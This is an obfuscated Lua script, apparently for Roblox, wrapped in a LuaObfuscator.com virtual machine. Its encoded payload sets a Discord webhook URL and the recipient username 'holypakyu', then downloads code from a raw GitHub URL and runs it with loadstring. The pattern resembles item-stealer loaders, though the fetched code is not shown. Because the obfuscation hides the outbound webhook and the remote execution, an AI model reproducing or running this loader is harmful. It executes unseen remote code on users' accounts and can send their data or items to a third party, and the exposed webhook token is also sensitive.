--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v68=v2(v0(v30,16));if v19 then local v76=v5(v68,v19);v19=nil;return v76;else return v68;end end end);local function v20(v31,v32,v33)if v33 then local v69=(v31/((570 -(367 + 201))^(v32-(2 -1))))%((5 -3)^(((v33-(1 -0)) -(v32-(1 + 0))) + (2 -1))) ;return v69-(v69%((883 -263) -(555 + 64))) ;else local v70=((2704 -(68 + 997)) -(1523 + 114))^(v32-(932 -(857 + 74))) ;return (((v31%(v70 + v70))>=v70) and 1) or (0 + 0) ;end end local function v21()local v34=1270 -(226 + 1044) ;local v35;while true do if (v34==((1 + 3) -3)) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (118 -(32 + 85)) ;v34=1 + (957 -(892 + 65)) ;end end end local function v22()local v36=(0 + 0) -0 ;local v37;local v38;while true do if (v36==(1 -0)) then return (v38 * (469 -213)) + v37 ;end if (v36==((1391 -1041) -((1039 -(802 + 150)) + 263))) then v37,v38=v1(v16,v18,v18 + (182 -(67 + 113)) );v18=v18 + 2 + (0 -0) ;v36=2 -1 ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + (5 -2) );v18=v18 + 3 + 1 ;return (v42 * 16777216) + (v41 * (66533 -(915 + 82))) + (v40 * 256) + v39 ;end local function v24()local v43=v23();local v44=v23();local v45=1;local v46=(v20(v44,2 -1 ,12 + 8 ) * ((2 -0)^((2705 -(998 + 488)) -(1069 + (1256 -(116 + 1022)))))) + v43 ;local v47=v20(v44,47 -26 ,(22 + 45) -36 );local v48=((v20(v44,6 + 26 )==((4 -3) -0)) and  -(1 + 0)) or ((465 + 327) -(368 + 423)) ;if (v47==(0 -0)) then if (v46==0) then return v48 * 0 ;else local v77=0;while true do if (v77==(18 -(10 + 8))) then v47=3 -2 ;v45=442 -(416 + 26) ;break;end end end elseif (v47==(6535 -4488)) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1461 -(145 + 293)) ) * (v45 + (v46/(2^((1711 -1229) -(37 + 7 + (1158 -(201 + 571))))))) ;end local function v25(v49)local v50=859 -(814 + 45) ;local v51;local v52;while true do if (v50==(7 -4)) then return v6(v52);end if (v50==(0 + 0)) then v51=nil;if  not v49 then v49=v23();if (v49==(0 + 0)) then return "";end end v50=886 -(261 + 246 + 378) ;end if (v50==(3 -(3 -2))) then v52={};for v78=1081 -(1020 + 60) , #v51 do v52[v78]=v2(v1(v3(v51,v78,v78)));end v50=1426 -(630 + 793) ;end if (v50==(3 -2)) then v51=v3(v16,v18,(v18 + v49) -(4 -(1750 -(760 + 987))) );v18=v18 + v49 ;v50=2;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 -0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53==3) then v60=nil;while true do local v80=0;local v81;while true do if (0==v80) then v81=280 -(99 + 181) ;while true do if (v81~=1) then else if (v54==1) then local v106=0;local v107;local v108;while true do if (v106==(0 + 0)) then v107=606 -(454 + 152) ;v108=nil;v106=1 -0 ;end if ((1289 -(993 + 295))==v106) then while true do if (v107~=0) then else v108=0 + 0 ;while true do if (v108==(1172 -(418 + 753))) then local v159=0 + 0 ;while true do if (v159~=(0 + 0)) then else for v177=1,v59 do local v178=0 + 0 ;local v179;local v180;local v181;while true do if (v178~=0) then else v179=0 + 0 ;v180=nil;v178=530 -(406 + 123) ;end if (v178==(1770 -(1749 + 20))) then v181=nil;while true do if (v179~=(0 + 0)) then else local v185=1322 -(1249 + 73) ;while true do if (v185~=0) then else v180=v21();v181=nil;v185=1;end if (v185~=1) then else v179=1 + 0 ;break;end end end if (v179==(1146 -(466 + 679))) then if (v180==1) then v181=v21()~=0 ;elseif (v180==2) then v181=v24();elseif (v180==3) then v181=v25();end v60[v177]=v181;break;end end break;end end end v58[6 -3 ]=v21();v159=1;end if (v159~=(2 -1)) then else v108=2;break;end end end if (v108==0) then v59=v23();v60={};v108=1901 -(106 + 1794) ;end if (v108==(1 + 1)) then v54=2;break;end end break;end end break;end end end break;end if (v81==0) then local v104=0 + 0 ;local v105;while true do if (0==v104) then v105=0 -0 ;while true do if (v105==(2 -1)) then v81=1;break;end if (v105==(114 -(4 + 110))) then local v109=584 -(57 + 527) ;while true do if (v109==0) then if (v54==0) then local v160=1427 -(41 + 1386) ;while true do if (2==v160) then v54=104 -(17 + 86) ;break;end if ((0 + 0)==v160) then local v175=0 -0 ;while true do if (v175~=(2 -1)) then else v160=1;break;end if (v175==(166 -(122 + 44))) then local v183=0 -0 ;while true do if (v183~=1) then else v175=3 -2 ;break;end if (v183~=0) then else v55={};v56={};v183=1 + 0 ;end end end end end if (v160~=(1 + 0)) then else local v176=0;while true do if (v176==0) then local v184=0 -0 ;while true do if (v184==1) then v176=66 -(30 + 35) ;break;end if (v184~=0) then else v57={};v58={v55,v56,nil,v57};v184=1;end end end if ((1213 -(323 + 889))==v176) then v160=5 -3 ;break;end end end end end if (v54==(582 -(361 + 219))) then local v161=0;local v162;while true do if (v161==(320 -(53 + 267))) then v162=0 + 0 ;while true do local v182=413 -(15 + 398) ;while true do if ((982 -(18 + 964))~=v182) then else if (v162==1) then return v58;end if (v162==0) then for v187=3 -2 ,v23() do local v188=0;local v189;local v190;while true do if (v188==1) then while true do if (0~=v189) then else v190=v21();if (v20(v190,1,1 + 0 )==(0 + 0)) then local v193=0;local v194;local v195;local v196;local v197;local v198;local v199;while true do if (v193==2) then v198=nil;v199=nil;v193=853 -(20 + 830) ;end if (v193==(3 + 0)) then while true do if (v194==1) then v197=nil;v198=nil;v194=128 -(116 + 10) ;end if (v194~=(0 + 0)) then else v195=738 -(542 + 196) ;v196=nil;v194=1;end if (v194==(3 -1)) then v199=nil;while true do if (v195~=1) then else local v200=0 + 0 ;local v201;while true do if (v200==0) then v201=0;while true do if (1==v201) then v195=2 + 0 ;break;end if (v201==0) then local v213=0;while true do if (1==v213) then v201=1;break;end if (v213==0) then v198=nil;v199=nil;v213=1;end end end end break;end end end if (v195==0) then local v202=0 + 0 ;local v203;while true do if (v202==(0 -0)) then v203=0 -0 ;while true do if (v203==(1552 -(1126 + 425))) then v195=406 -(118 + 287) ;break;end if (v203==(0 -0)) then local v214=0;while true do if (v214==(1121 -(118 + 1003))) then v196=0;v197=nil;v214=2 -1 ;end if (v214~=1) then else v203=1;break;end end end end break;end end end if (v195~=2) then else while true do if (v196~=(380 -(142 + 235))) then else if (v20(v198,3,13 -10 )~=(1 + 0)) then else v199[981 -(553 + 424) ]=v60[v199[4]];end v55[v187]=v199;break;end if (v196==(3 -1)) then local v205=0;local v206;while true do if (v205==(0 + 0)) then v206=0 + 0 ;while true do if (v206~=1) then else v196=3;break;end if (v206==(0 + 0)) then local v215=0;local v216;while true do if (0==v215) then v216=0;while true do if (v216~=(1 + 0)) then else v206=1 + 0 ;break;end if (v216==0) then local v221=0 -0 ;while true do if (v221==(2 -1)) then v216=1;break;end if (v221==(0 -0)) then if (v20(v198,1 + 0 ,4 -3 )~=(754 -(239 + 514))) then else v199[2]=v60[v199[2]];end if (v20(v198,1 + 1 ,2)~=1) then else v199[3]=v60[v199[1332 -(797 + 532) ]];end v221=1 + 0 ;end end end end break;end end end end break;end end end if (v196~=(0 + 0)) then else local v207=0;local v208;while true do if (v207~=(0 -0)) then else v208=1202 -(373 + 829) ;while true do if (v208==1) then v196=1;break;end if (v208==0) then local v217=0;while true do if (v217==(731 -(476 + 255))) then v197=v20(v190,2,1133 -(369 + 761) );v198=v20(v190,3 + 1 ,6);v217=1 -0 ;end if (v217==(1 -0)) then v208=1;break;end end end end break;end end end if (v196~=1) then else local v209=238 -(64 + 174) ;local v210;while true do if (v209~=(0 + 0)) then else v210=0 -0 ;while true do if (v210==(336 -(144 + 192))) then v199={v22(),v22(),nil,nil};if (v197==(0 + 0)) then local v218=0 + 0 ;local v219;while true do if (v218==(1504 -(363 + 1141))) then v219=0;while true do if (v219==0) then v199[1583 -(1183 + 397) ]=v22();v199[11 -7 ]=v22();break;end end break;end end elseif (v197==(1 + 0)) then v199[3 + 0 ]=v23();elseif (v197==(1977 -(1913 + 62))) then v199[3]=v23() -(2^16) ;elseif (v197~=(2 + 1)) then else local v225=0;local v226;while true do if (v225==(0 -0)) then v226=1933 -(565 + 1368) ;while true do if (v226==(0 -0)) then v199[3]=v23() -((1663 -(1477 + 184))^16) ;v199[4]=v22();break;end end break;end end end v210=1 -0 ;end if (v210==1) then v196=2;break;end end break;end end end end break;end end break;end end break;end if (v193==0) then v194=0 + 0 ;v195=nil;v193=857 -(564 + 292) ;end if (v193~=(1 -0)) then else v196=nil;v197=nil;v193=2;end end end break;end end break;end if (v188==0) then v189=0 -0 ;v190=nil;v188=305 -(244 + 60) ;end end end for v191=1 + 0 ,v23() do v56[v191-(477 -(41 + 435)) ]=v28();end v162=1;end break;end end end break;end end end v109=1;end if ((1002 -(938 + 63))~=v109) then else v105=1;break;end end end end break;end end end end break;end end end break;end if (v53==(0 + 0)) then v54=0;v55=nil;v53=1126 -(936 + 189) ;end if (v53==1) then v56=nil;v57=nil;v53=2;end if (v53==(1 + 1)) then local v71=1613 -(1565 + 48) ;local v72;while true do if (v71==(0 + 0)) then v72=0;while true do if (0==v72) then v58=nil;v59=nil;v72=1;end if (v72==(1139 -(782 + 356))) then v53=3;break;end end break;end end end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (0==v64) then v65=v61[1];v66=v61[2];v64=1;end if (v64==1) then v67=v61[3];return function(...)local v82=v65;local v83=v66;local v84=v67;local v85=v27;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v96=0,v90 do if (v96>=v84) then v88[v96-v84 ]=v89[v96 + 1 ];else v92[v96]=v89[v96 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do local v97=0;while true do if (v97==1) then if (v95<=10) then if (v95<=4) then if (v95<=1) then if (v95==0) then local v110=0;local v111;while true do if (0==v110) then v111=v94[2];v92[v111]=v92[v111](v13(v92,v111 + 1 ,v87));break;end end else v86=v94[3];end elseif (v95<=2) then v92[v94[2]]=v94[3];elseif (v95>3) then v92[v94[2]]=v94[3];else v92[v94[2]][v94[3]]=v94[4];end elseif (v95<=7) then if (v95<=5) then if (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86=v94[3];end elseif (v95==6) then do return;end else local v131=0;local v132;local v133;local v134;local v135;while true do if (v131==0) then v132=v94[2];v133,v134=v85(v92[v132](v13(v92,v132 + 1 ,v94[3])));v131=1;end if (v131==1) then v87=(v134 + v132) -1 ;v135=0;v131=2;end if (v131==2) then for v171=v132,v87 do v135=v135 + 1 ;v92[v171]=v133[v135];end break;end end end elseif (v95<=8) then local v115=0;local v116;local v117;while true do if (v115==0) then v116=v94[2];v117=v92[v94[3]];v115=1;end if (v115==1) then v92[v116 + 1 ]=v117;v92[v116]=v117[v94[4]];break;end end elseif (v95>9) then v92[v94[2]]=v63[v94[3]];else do return;end end elseif (v95<=15) then if (v95<=12) then if (v95==11) then v92[v94[2]]();else v92[v94[2]]();end elseif (v95<=13) then v92[v94[2]]=v94[3]~=0 ;elseif (v95>14) then v92[v94[2]]=v63[v94[3]];else v86=v94[3];end elseif (v95<=18) then if (v95<=16) then v92[v94[2]][v94[3]]=v94[4];elseif (v95>17) then local v141=0;local v142;while true do if (v141==0) then v142=v94[2];v92[v142]=v92[v142](v13(v92,v142 + 1 ,v87));break;end end else v92[v94[2]]=v94[3]~=0 ;end elseif (v95<=19) then local v121=0;local v122;local v123;local v124;local v125;while true do if (v121==1) then v87=(v124 + v122) -1 ;v125=0;v121=2;end if (v121==0) then v122=v94[2];v123,v124=v85(v92[v122](v13(v92,v122 + 1 ,v94[3])));v121=1;end if (v121==2) then for v155=v122,v87 do v125=v125 + 1 ;v92[v155]=v123[v125];end break;end end elseif (v95==20) then if (v92[v94[2]]==v94[4]) then v86=v86 + 1 ;else v86=v94[3];end else local v144=0;local v145;local v146;while true do if (v144==1) then v92[v145 + 1 ]=v146;v92[v145]=v146[v94[4]];break;end if (v144==0) then v145=v94[2];v146=v92[v94[3]];v144=1;end end end v86=v86 + 1 ;break;end if (0==v97) then v94=v82[v86];v95=v94[1];v97=1;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31323339303O36383335393538353830332F5654656C61526E41715347734F51337666535732346A4A5378743150794171337765543952677446536B50444F6943362D35686F5A4A6D424E547169425A454B692D6B79030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503093O00686F6C7970616B797503093O00557365724E616D653200173O0012043O00013O0026143O000E0001000200040E3O000E000100120F000100033O00300300010004000500120F000100063O00120F000200073O002015000200020008001204000400094O0011000500014O0007000200054O001200013O00022O000B00010001000100040E3O001600010026143O00010001000100040E3O0001000100120F000100033O0030030001000A000B00120F000100033O0030030001000C000B0012043O00023O00040E3O000100012O00063O00017O00",v9(),...);end
